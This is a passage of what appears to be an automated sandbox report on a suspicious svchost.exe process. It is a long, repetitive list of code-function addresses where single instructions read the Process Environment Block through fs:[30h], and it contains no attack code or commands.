Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C8158 mov eax, dword ptr fs:[00000030h]	1_2_031C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]	1_2_03204164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]	1_2_03204164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]	1_2_03136154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]	1_2_03136154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov ecx, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]	1_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]	1_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]	1_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03170185 mov eax, dword ptr fs:[00000030h]	1_2_03170185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]	1_2_031EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]	1_2_031EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]	1_2_031D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]	1_2_031D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032061E5 mov eax, dword ptr fs:[00000030h]	1_2_032061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]	1_2_031F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]	1_2_031F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031601F8 mov eax, dword ptr fs:[00000030h]	1_2_031601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B4000 mov ecx, dword ptr fs:[00000030h]	1_2_031B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6030 mov eax, dword ptr fs:[00000030h]	1_2_031C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A020 mov eax, dword ptr fs:[00000030h]	1_2_0312A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C020 mov eax, dword ptr fs:[00000030h]	1_2_0312C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132050 mov eax, dword ptr fs:[00000030h]	1_2_03132050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6050 mov eax, dword ptr fs:[00000030h]	1_2_031B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315C073 mov eax, dword ptr fs:[00000030h]	1_2_0315C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313208A mov eax, dword ptr fs:[00000030h]	1_2_0313208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F60B8 mov eax, dword ptr fs:[00000030h]	1_2_031F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_031F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031280A0 mov eax, dword ptr fs:[00000030h]	1_2_031280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C80A8 mov eax, dword ptr fs:[00000030h]	1_2_031C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B20DE mov eax, dword ptr fs:[00000030h]	1_2_031B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0312C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031720F0 mov ecx, dword ptr fs:[00000030h]	1_2_031720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0312A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031380E9 mov eax, dword ptr fs:[00000030h]	1_2_031380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B60E0 mov eax, dword ptr fs:[00000030h]	1_2_031B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130710 mov eax, dword ptr fs:[00000030h]	1_2_03130710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160710 mov eax, dword ptr fs:[00000030h]	1_2_03160710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C700 mov eax, dword ptr fs:[00000030h]	1_2_0316C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]	1_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316273C mov ecx, dword ptr fs:[00000030h]	1_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]	1_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AC730 mov eax, dword ptr fs:[00000030h]	1_2_031AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]	1_2_0316C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]	1_2_0316C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130750 mov eax, dword ptr fs:[00000030h]	1_2_03130750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BE75D mov eax, dword ptr fs:[00000030h]	1_2_031BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]	1_2_03172750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]	1_2_03172750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B4755 mov eax, dword ptr fs:[00000030h]	1_2_031B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316674D mov esi, dword ptr fs:[00000030h]	1_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]	1_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]	1_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138770 mov eax, dword ptr fs:[00000030h]	1_2_03138770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D678E mov eax, dword ptr fs:[00000030h]	1_2_031D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031307AF mov eax, dword ptr fs:[00000030h]	1_2_031307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E47A0 mov eax, dword ptr fs:[00000030h]	1_2_031E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0313C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B07C3 mov eax, dword ptr fs:[00000030h]	1_2_031B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]	1_2_031347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]	1_2_031347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]	1_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]	1_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]	1_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_031BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172619 mov eax, dword ptr fs:[00000030h]	1_2_03172619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE609 mov eax, dword ptr fs:[00000030h]	1_2_031AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E627 mov eax, dword ptr fs:[00000030h]	1_2_0314E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03166620 mov eax, dword ptr fs:[00000030h]	1_2_03166620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168620 mov eax, dword ptr fs:[00000030h]	1_2_03168620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313262C mov eax, dword ptr fs:[00000030h]	1_2_0313262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314C640 mov eax, dword ptr fs:[00000030h]	1_2_0314C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03162674 mov eax, dword ptr fs:[00000030h]	1_2_03162674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]	1_2_031F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]	1_2_031F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]	1_2_0316A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]	1_2_0316A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]	1_2_03134690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]	1_2_03134690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031666B0 mov eax, dword ptr fs:[00000030h]	1_2_031666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0316C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0316A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0316A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]	1_2_031B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]	1_2_031B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6500 mov eax, dword ptr fs:[00000030h]	1_2_031C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138550 mov eax, dword ptr fs:[00000030h]	1_2_03138550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138550 mov eax, dword ptr fs:[00000030h]	1_2_03138550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]	1_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]	1_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]	1_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E59C mov eax, dword ptr fs:[00000030h]	1_2_0316E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132582 mov eax, dword ptr fs:[00000030h]	1_2_03132582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132582 mov ecx, dword ptr fs:[00000030h]	1_2_03132582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164588 mov eax, dword ptr fs:[00000030h]	1_2_03164588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h]	1_2_031545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h]	1_2_031545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]	1_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]	1_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]	1_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031365D0 mov eax, dword ptr fs:[00000030h]	1_2_031365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0316A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0316A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h]	1_2_0316E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h]	1_2_0316E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031325E0 mov eax, dword ptr fs:[00000030h]	1_2_031325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]	1_2_0316C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]	1_2_0316C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]	1_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]	1_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]	1_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]	1_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]	1_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]	1_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C427 mov eax, dword ptr fs:[00000030h]	1_2_0312C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA456 mov eax, dword ptr fs:[00000030h]	1_2_031EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312645D mov eax, dword ptr fs:[00000030h]	1_2_0312645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315245A mov eax, dword ptr fs:[00000030h]	1_2_0315245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]	1_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]	1_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]	1_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC460 mov ecx, dword ptr fs:[00000030h]	1_2_031BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA49A mov eax, dword ptr fs:[00000030h]	1_2_031EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031644B0 mov ecx, dword ptr fs:[00000030h]	1_2_031644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_031BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031364AB mov eax, dword ptr fs:[00000030h]	1_2_031364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031304E5 mov ecx, dword ptr fs:[00000030h]	1_2_031304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
